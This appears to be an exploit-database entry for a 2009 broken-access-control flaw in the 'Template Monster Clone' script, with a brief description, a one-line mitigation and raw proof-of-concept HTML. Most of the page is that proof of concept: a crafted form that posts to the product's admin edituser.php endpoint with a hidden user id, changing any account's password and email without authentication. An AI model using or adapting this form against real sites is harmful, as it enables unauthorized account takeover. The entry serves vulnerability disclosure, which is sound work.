Template Monster Clone Change Password

vendor:

Template Monster Clone

by:

5.5

CVSS

MEDIUM

Change Password Vulnerability

284

CWE

Product Name: Template Monster Clone

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Template Monster Clone Change Password

The Template Monster Clone website is vulnerable to a change password vulnerability. Attackers can manipulate the form fields to change the password of any user on the website.

Mitigation:

Implement proper input validation and authentication checks to prevent unauthorized password changes.

Source

Exploit-DB raw data:

<title>  Template Monster Clone Change Password </title>
 </head>

  <head>
 
 </head>

  <body bgcolor="#000000">

  <p><font size="6" color="#FF0000"><a href="http://www.2daybiz.com/">
 <font color="#FF0000">2daybiz</font></a> Template
  Monster Clone&nbsp; </font></p>

  <TABLE border=0 width=780 align=center>
<TR>
  <TD><TABLE width="100%" align="center">
  <TR>
  <TD valign=top><!--  
<TABLE width=200 >

<TR>
  <TD >
  <TABLE >
  <TR>
  <TD><a href=showcategory.php>Add Categoty</a></TD>
  </TR>
  <TR>
  <TD><a href=addtemplatecategory.php>Add Templates</a></TD>
  </TR>
  <TR>
  <TD><a href=addcategory.php>Edit Templates</a></TD>
  </TR>
  <TR>
  <TD><a href=addcategory.php>Show Templates</a></TD>
  </TR>
  </TABLE>
   
  </TD>
</TR>
</TABLE>
--></TD>
   
  <TD> <!-- this is the main section -->


<table><tr><td><table><tr><td><table width=300" border=0 ><tr><td width=90%>
  &nbsp;</td><td align=right width=10%>&nbsp;</td></tr></table></td></tr><td><form name=frmSignup method=post action =http://www.2daytemplates.com/admin/edituser.php?id=16 onSubmit="return submitHandler(document);">
<TABLE align="center">
<TR>
  <TD></TD>
</TR>
<TR>
  <TD>&nbsp;&nbsp</TD>
</TR>


<TR>
  <TD><font size="5">&nbsp;<font color="#FF0000">&nbsp;Login Name</font>e</font></TD>
  <TD><input type =text class=inputstyle name= loginname value = ></TD>
</TR>
<TR>
  <TD><font size="5">&nbsp;&nbsp;</font><font color="#FF0000"><font size="5">Password</font></font></TD>
  <TD><input type =text class=inputstyle name= password value = ></TD>
</TR>

<TR>
  <TD><font color="#FF0000" size="5">&nbsp;&nbsp;Email</font></TD>
  <TD><input type =text class=inputstyle name= email value = ></TD>
</TR>
<TR>
  <TD><font color="#FF0000" size="5">&nbsp;&nbsp;First Name</font></TD>
  <TD><input type =text class=inputstyle name= firstname value =></TD>
</TR>

<TR>
  <TD><font color="#FF0000" size="5">&nbsp;&nbsp;Last Name</font></TD>
  <TD><input type =text class=inputstyle name= lastname value =></TD>
</TR>

<TR>
  <TD colspan=4 align=center>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input class=inputstyle type = submit name=submit value=submit>
  <input type = hidden name=userid value = 16></TD>
  <TD></TD>
</TR>
</TABLE>
</form></TD> </TR> </TABLE></TD></TR></TABLE></td> <!-- this end the main section -->
  </TR>
  </TABLE></TD>
</TR>
<TR>
  <TD></TD>
</TR>
</TABLE>
</body>
  <p><font size="6" color="#FF0000">C</font><font size="5" color="#FF0000">od[3]d By TiGeR-Dz</font></p>
  <p><a href="mailto:Mail:Tiger.dz@live.com"><font color="#FF0000" size="6">Mail</font><font size="5" color="#FF0000">:</font><font size="5" color="#FFFFFF">Tiger.dz@live.com</font></a></p>
 <p><font size="5" color="#FF0000">Script:</font><font size="5" color="#FFFFFF">Template 
 Monster Clone</font></p>
 <p><font size="5" color="#FF0000">Home:<a href="http://www.2daybiz.com/"><font color="#FFFFFF">http://www.2daybiz.com/</font></a></font></p>
 <p><font size="5" color="#FF0000">Download:</font><font size="5" color="#FFFFFF">http://www.2daybiz.com/template_monster_download.html</font></p>

<p align="center">
&nbsp;</p>
<p align="center">
&nbsp;</p>


</html>

# milw0rm.com [2009-05-14]